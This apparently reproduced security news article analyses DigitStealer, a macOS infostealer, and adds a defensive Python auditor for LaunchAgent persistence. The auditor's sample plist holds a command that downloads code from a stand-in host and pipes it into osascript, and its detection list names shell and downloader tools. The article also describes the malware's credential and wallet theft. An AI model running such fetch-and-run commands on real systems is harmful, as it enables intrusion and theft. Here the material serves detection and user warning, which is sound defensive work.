New macOS Malware ‘DigitStealer’ Targets Apple M2/M3 Chips

Summary
– DigitStealer is a sophisticated macOS infostealer that disguises itself as legitimate apps like DynamicLake or Google Drive for desktop.
– It performs system checks to avoid running on virtual machines, Intel-based Macs, M1 chips, or in specific geographic regions, targeting only newer Apple Silicon M2 or later devices.
– The malware delivers four payloads: one steals passwords and resets security settings, another exfiltrates browser data and cryptocurrency wallets, a third hijacks Ledger crypto applications, and the fourth ensures persistence with a backdoor.
– It tricks users into bypassing Gatekeeper by having them drag the file into Terminal from a spoofed website, rather than using the standard installation method.
– Users are advised to verify download sources, scan files with VirusTotal, avoid dragging apps to Terminal, and check app signatures to protect against such threats.
A newly identified and highly sophisticated malware strain, dubbed DigitStealer, is actively targeting macOS systems, specifically those running on the latest Apple M2 and M3 chips. This advanced infostealer cleverly disguises itself as the legitimate DynamicLake UI enhancement tool and potentially mimics Google’s Drive for desktop application, tricking users into installing malicious software.
The attack begins with a multi-stage delivery process. A bash script that runs entirely in memory performs several critical checks before any payload executes. It first reads the system’s country setting and terminates if the machine appears to be located in certain geographic regions. It then determines whether the system is a virtual machine and checks for specific hardware features to confirm it is running on an Apple Silicon M2 chip or a newer model. Interestingly, the malware avoids Intel-based Macs and, whether by design or error, also skips systems with the M1 chip, focusing its attack exclusively on devices with the newer ARM features found in M2 and later processors.
Once the environment is deemed suitable, the script retrieves and executes four distinct payloads. The first is a simple AppleScript infostealer that prompts the user to enter their password. If provided, it immediately begins exfiltrating credentials and small user files such as documents and notes. It also resets the macOS TCC database, which stores records of which applications are permitted to access sensitive data or system features.
The second payload collects, compresses, and sends data from a variety of popular web browsers. It targets the Keychain database, VPN configuration files, the Telegram tdata folder, which can be exploited to hijack Telegram accounts, and cryptocurrency wallet files from platforms including Ledger, Electrum, Exodus, and Coinomi.
A third payload specifically attacks the Ledger Wallet or Ledger Live cryptocurrency application by replacing its app.asar file with a trojanized version. This malicious file forces the application to connect to a server controlled by the attacker, effectively hijacking the wallet and allowing the interception or manipulation of the victim’s cryptocurrency data.
Finally, the fourth payload installs a Launch Agent on the target system to ensure persistence. Each time the agent runs, it dynamically fetches additional payloads from the attacker’s server. At the time of analysis this final component is a backdoor, a JavaScript for Automation (JXA) script with full AppleScript capabilities, but the attacker retains the ability to change these payloads at any time.
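The persistence mechanism just described gives defenders something concrete to look for: a Launch Agent whose program is an interpreter or downloader that pulls code from a remote server on every launch. The following Python script is an added example, not code from the article, from HelpNet Security or from the researchers who analysed DigitStealer. It audits the property lists in a LaunchAgents folder for that fetch-on-launch pattern. The interpreter list, the regular expressions and the two sample plists are assumptions constructed for illustration, not indicators taken from the campaign.

```python
"""Audit macOS LaunchAgent property lists for fetch-on-launch persistence.

Added example for this article; not code from the article or from the
researchers who analysed DigitStealer. It assumes only the pattern the
article describes: a LaunchAgent whose program runs an interpreter or
downloader that retrieves further code from a remote server at launch.
Binary names, regexes and the sample plists are constructed.
"""
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Interpreters and downloaders that a legitimate app's LaunchAgent rarely
# invokes as its top-level program (assumed list; extend as needed).
SUSPICIOUS_BINARIES = {"osascript", "bash", "sh", "zsh", "curl", "python3", "python", "perl"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
DECODE_RE = re.compile(r"\b(base64|xxd|openssl enc)\b")
# Program or argument living under /tmp, /private/tmp, /var/tmp or a hidden directory.
STAGING_RE = re.compile(r"(^|\s)/(private/)?(tmp|var/tmp)/|/\.[^/\s]+/")


def audit_plist(data: bytes, name: str = "<inline>") -> List[str]:
    """Return human-readable findings for one LaunchAgent plist (empty if clean)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed or truncated plist
        return [f"{name}: unparseable plist ({exc})"]

    args = [str(a) for a in plist.get("ProgramArguments") or []]
    if not args and plist.get("Program"):
        args = [str(plist["Program"])]
    if not args:
        return [f"{name}: no Program or ProgramArguments"]

    binary = Path(args[0]).name
    joined = " ".join(args)
    findings: List[str] = []
    if binary in SUSPICIOUS_BINARIES:
        findings.append(f"{name}: top-level program is interpreter/downloader '{binary}'")
        if "-c" in args[1:] or "-e" in args[1:]:
            findings.append(f"{name}: inline script passed with -c/-e")
    if URL_RE.search(joined):
        findings.append(f"{name}: arguments contain a URL (code fetched at launch)")
    if DECODE_RE.search(joined):
        findings.append(f"{name}: decodes an encoded payload at launch")
    if STAGING_RE.search(joined):
        findings.append(f"{name}: program or argument in a temp or hidden directory")
    return findings


def audit_directory(directory: Path) -> Dict[str, List[str]]:
    """Audit every *.plist in a LaunchAgents directory; map file name -> findings."""
    results: Dict[str, List[str]] = {}
    for path in sorted(directory.glob("*.plist")):
        findings = audit_plist(path.read_bytes(), path.name)
        if findings:
            results[path.name] = findings
    return results


# Constructed samples: an ordinary helper agent and a fetch-on-launch agent.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Example.app/Contents/MacOS/ExampleHelper</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.launcher</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>curl -fsSL https://example.invalid/stage2 | osascript -l JavaScript</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def demo() -> Dict[str, List[str]]:
    """Write both samples to a scratch directory and audit it like a real folder."""
    with tempfile.TemporaryDirectory() as tmp:
        tmpdir = Path(tmp)
        (tmpdir / "com.example.updater.plist").write_bytes(BENIGN_PLIST)
        (tmpdir / "com.example.launcher.plist").write_bytes(SUSPICIOUS_PLIST)
        return audit_directory(tmpdir)


if __name__ == "__main__":
    # On a real Mac: audit_directory(Path.home() / "Library" / "LaunchAgents")
    for agent, notes in demo().items():
        print(agent)
        for note in notes:
            print("  -", note)
```

These are heuristics, not a signature: a finding means the agent deserves a look, not that it is malicious. On a live system, pair the output with `launchctl list` to see which of the flagged agents are actually loaded, and compare the program path against the signed app bundle it claims to belong to.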
The initial infection vector involves an unsigned disk image file named DynamicLake.dmg. Researchers have identified several disk images associated with this campaign. The malicious file is distributed through a fraudulent website, https[:]//dynamiclake[.]org, which closely imitates the legitimate DynamicLake utility site. Unsuspecting users who visit this spoofed site are instructed to drag the file into the Mac’s Terminal application, a technique that bypasses macOS’s built-in Gatekeeper security feature.
Attribution for this specific malware variant remains unclear. However, the methods used indicate a deep understanding of the macOS operating system and a persistent focus on evading detection. Malicious actors continue to exploit legitimate services and distribution techniques to circumvent macOS security controls and increase their success rates.
In recent months, attackers have created convincing replicas of GitHub repositories for popular Mac applications, again using the “drag-to-Terminal” trick to deceive users into running harmful scripts. The standard procedure for installing a Mac application is to drag it into the Applications folder, making this method particularly deceptive. More recently, a Reddit user reported encountering both the fake DynamicLake application and a counterfeit version of an app called AirPosture, though it is uncertain if these lead to a DigitStealer infection.
To protect against such threats, users should exercise extreme caution when searching for and installing new software. Always double-check that you are on the correct website or official GitHub repository. Before running any installer, use a service like VirusTotal to scan the downloaded file. Never drag an application into the Terminal window, as this is not a standard installation step. You can also use specialized applications to verify an app’s or installer’s digital signature. Staying informed through reliable security news sources can help you avoid falling victim to emerging threats.
(Source: HelpNet Security)
